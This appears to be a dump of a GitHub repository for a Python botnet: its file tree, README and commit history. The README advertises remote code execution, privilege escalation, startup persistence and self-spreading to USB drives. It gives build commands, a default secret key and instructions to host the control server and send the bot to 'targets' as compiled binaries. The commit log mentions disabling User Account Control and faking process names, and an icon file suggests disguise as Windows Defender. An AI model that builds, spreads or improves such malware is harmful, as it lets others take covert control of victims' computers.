======================: FILES :======================
botnet
├── asset
│   ├── network.ico
│   └── windows_defender.ico
├── botnetctl.py
├── bot.pyw
├── comm.json
├── LICENSE
├── make_all.bat
├── make_all.sh
├── make_debug_executable.bat
├── make_debug_executable.sh
├── make_executable.bat
├── make_executable.sh
├── README.md
├── requirements.txt
└── server.py

1 directory, 15 files
======================: README CONTENT :======================
# Botnet
A simple botnet written 100% in python and distrubutable to any major OSs on which this will run natively.


## Warning
THIS SOFTWARE WAS CREATED FOR EDUCATION PERPOSES ONLY.

AUTHOR WILL NOT TAKE RESPONSABILITIES OF ANY HARMS AND/OR DAMAGES CAUSED BY THIS SOFTWARE. 
## Features
This botnet has :
1. Remote code execution
2. Acquires Administrator Previleges (Windows)
3. Adds the bot to startup (Windows)
4. Replecates itself to all removable drives (Windows)

## Build Methods
### Windows
Requirements:
* Python 3.6 or higher 
* Git
```cmd
git clone https://github.com/NurTasin/botnet.git
cd botnet
pip install -r requirements.txt
make_all.bat
```
### Linux
Requirements:
* Git
* Python 3.6 or higher
* Python3-pip
```sh
git clone https://github.com/NurTasin/botnet.git
cd botnet
pip install -r requirements.txt
sh make_all.sh
```
### MacOS
> I don't own a mac. So this code is not tested on MacOS.

Requirements:
* Git
* Python 3.6 or higher
* Python3-pip
```sh
git clone https://github.com/NurTasin/botnet.git
cd botnet
pip install -r requirements.txt
sh make_all.sh
```
## Server
DEFAULT_SECRET_KEY: `doyal_baba`

Deploy the server.py file to your cloude provider or on your computer.
After that change the address on bot.py (Line 6) and botctl.py (Line 3).
And you are ready to rock and roll. Just send bot.py to your targets.

## Reccomendations
If you distribute bot.py file then you have to make sure that your target device can run python file...
But it is reccomended to ditribute the compiled binary (*.exe or *.elf or *.dmg). These kinds of files
can be run on any device without dependencies.
====================== GIT HISTORY: ======================
cb597e1 HEAD@{0}: clone: from https://github.com/NurTasin/botnet
commit cb597e1f350995810d4cc21a6ac0f59beda8f2e2
Author: NurTasin <nmuatasin2005@gmail.com>
Date:   Thu Aug 5 17:44:19 2021 +0600

    Added feature to replecate it self to removable drives on Windows
    Added some script to create debug builds (spawns a console)

commit ba28bc9068004c3aa68c1025857920d6310f503e
Merge: b6656fe b3ee3d1
Author: NurTasin <nmuatasin2005@gmail.com>
Date:   Wed Aug 4 18:03:23 2021 +0600

    Merge branch 'main' of https://github.com/NurTasin/botnet

commit b6656feaab73544e102af185d44c73e9083379c3
Author: NurTasin <nmuatasin2005@gmail.com>
Date:   Wed Aug 4 18:01:08 2021 +0600

    disables User Account Control from getting admin previllages from user

commit b3ee3d1baa2036733d070c0681cbcb076b582702
Author: Nur Mahmud Ul Alam Tasin <62534505+NurTasin@users.noreply.github.com>
Date:   Tue Jul 27 17:56:25 2021 +0600

    Update README.md

commit 2e3d699661eef86a58dbfff49a8fc47de60ef87d
Author: NurTasin <nmuatasin2005@gmail.com>
Date:   Mon Jul 26 14:41:50 2021 +0600

    restricted add2startup() only to run on Windows Systems

commit d4b5ce15d6e54071a9365b29b5558757d120e35c
Author: NurTasin <nmuatasin2005@gmail.com>
Date:   Mon Jul 26 14:34:08 2021 +0600

    Added Abilities to run as administrator and run on startup

commit 5cc29c4b87607f58a45ca2874c246e12b70efde2
Author: NurTasin <nmuatasin2005@gmail.com>
Date:   Mon Jul 26 12:40:14 2021 +0600

    Linux Fake Process Name Modified

commit 7536422cbf4cd559798481a7b13faad34949c999
Author: NurTasin <nmuatasin2005@gmail.com>
Date:   Mon Jul 26 12:37:05 2021 +0600

    Updated executable scripts

commit 02c7e123f72f0d52cc8ed072b7481740348449bd
Author: NurTasin <nmuatasin2005@gmail.com>
Date:   Mon Jul 26 12:11:43 2021 +0600

    Added scripts for making executables on Windows

commit 10b4ccbad2f47068d16fb64fb1bb7e62445427fc
Author: NurTasin <nmuatasin2005@gmail.com>
Date:   Mon Jul 26 12:06:38 2021 +0600

    added script for linux and macOS for creating executable binaries.
    Changes to be committed:
            modified:   README.md
            renamed:    bot.py -> bot.pyw
            new file:   make_executable.sh
            modified:   requirements.txt

commit b77ecc9fefcc9102f0482fcfd5a86b4704341dcd
Author: NurTasin <nmuatasin2005@gmail.com>
Date:   Mon Jul 26 11:51:05 2021 +0600

    Initial Commit
